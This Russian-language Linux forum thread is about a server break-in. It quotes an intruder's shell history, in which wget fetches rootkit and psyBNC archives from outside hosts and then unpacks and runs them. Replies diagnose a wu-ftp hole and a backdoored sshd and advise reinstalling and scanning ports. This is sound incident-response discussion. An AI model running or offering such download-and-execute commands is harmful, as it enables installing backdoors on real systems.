LINUX.ORG.RU
ФорумSecurity

В системе появилась новая учетная запись Daniel


0

0

Новый пользователь и новая группа, называются daniel.

Вот история того, что сделал daniel (подключившись через ssh):
=================================================
# START CUT
=================================================

w
// ftp был запрещен. Человек решил использовать wget
ftp -v 209.171.43.28
// :)
wgte
wget
wget snow.prohosting.com/dani3l/daniel.tgz
wget ps-lov.us/daniel.tgz
tar xzvf daniel.tgz
cd daniel
./install
mkdir dan
cd dan
wget snow.prohosting.com/uzzy05/psycompilde.tgz
wget snow.prohosting.com/uzzy05/psybnc.tgz
tar xzvf psybnc.tgz
cd psybnc
./psybnc
ps axd
ps ax
kill -9 1741
=================================================
# END CUT
=================================================


Кто может объяснить:
как пользователь мог получить права root,
почему в логах я не увидел создание нового пользователя
daniel,
что за программа psybnc

В папке daniel/dan была куча всяких стандартных программ,
которые, по-видимому, подправлены для более легкого доступа к системе в дальнейшем.
Почему пользователь позже работал только под логином daniel

Что делать и чего читать?


как он root получил из приведенного неясно. Судя по скриптам, я предполагаю, что через дырку в wu-ftp, но совершенно необязательно. Логи он, скорее всего потер. программа psybnc - это прокси для irc.

Прочитать сначала FAQ, если машина не сильно критичная, сделать полный бэкап всех винтов и последить за ним. Он поставил rootkit и sshd на порту 123. Не исключено, он еще вернется.

Если что, обсуждение можно перенести в e-mail, потом тут опубликовать результат.

ivlad ★★★★★
()
Ответ на: комментарий от ivlad

Да, дыра была через wu-ftp

Мать его... :(

вопрос: А как заменить все "backdoor" программы из rootkit
на нормальные.
Машина критична.
Пациент будет жить?

Utandr
() автор топика

впринципе спасти можно попробовать конечно, некоторое время данная конфигурация поживет.... но рекомендую все же переставится. Для восстановления бинарников, качаешь этот Daniel.tgz с ps-lov.us/daniel.tgz , также разархивируешь и смотрешь его инсталяционный bash скрипт, в нем уже ясно какие бинари были заменены - соответственно меняешь их на свои из дистрибутива.

mator ★★★★★
()

Мыло у товарища не работает. ;) Мэйл-сервер, видать, тоже поломали.

Что делать:

- Переставить софт из дистрибутива.
- Просканить машину, не осталось ли каких странных портов
- поставить апдейты (см. FAQ)

Для чего мы FAQ пишем???

ivlad ★★★★★
()

Главное - не дрейфь. Первый взлом - это как, извините, лишение девственности. Вступление в взрослую жизнь. ;)

ivlad ★★★★★
()
Ответ на: комментарий от mator

ну расказывай что , где и как у тебя стоит а там посмотрим ;)))

anonymous
()

ненавижу блядь хакеров .

anonymous
()

народ, подскажите пожалуйста, что может висеть на 32768 и 7741 портах?? уж как я тока и не пытался вынюхать, так и не смог допреть что у меня тут висит:-( просто не очень приятно, когда не знаешь, что, а главное зачем у тебя запущено, да еще и порты открывает...

dgeliko ★★
()

По поводу портов сказать трудно сам должен разгребать
а помоч может
в linux --- bash#socklist
во FreeBSD --- bash#sockstat
там PID узнаеш а по PID через
ps -aux | grep номер_процесса
увидишь его имя
во FreeBSD sockstat более наглядный или просто я к Free привык

sanders
()

попробуй netstat -apn

saper ★★★★★
()

2dgeliko
>народ, подскажите пожалуйста, что может висеть на 32768 и 7741 портах??
netstat -nltup | grep \:32768
netstat -nltup | grep \:7741
возможно придется смотреть под рутом

sco-killer
()
Вы не можете добавлять комментарии в эту тему. Тема перемещена в архив.
Security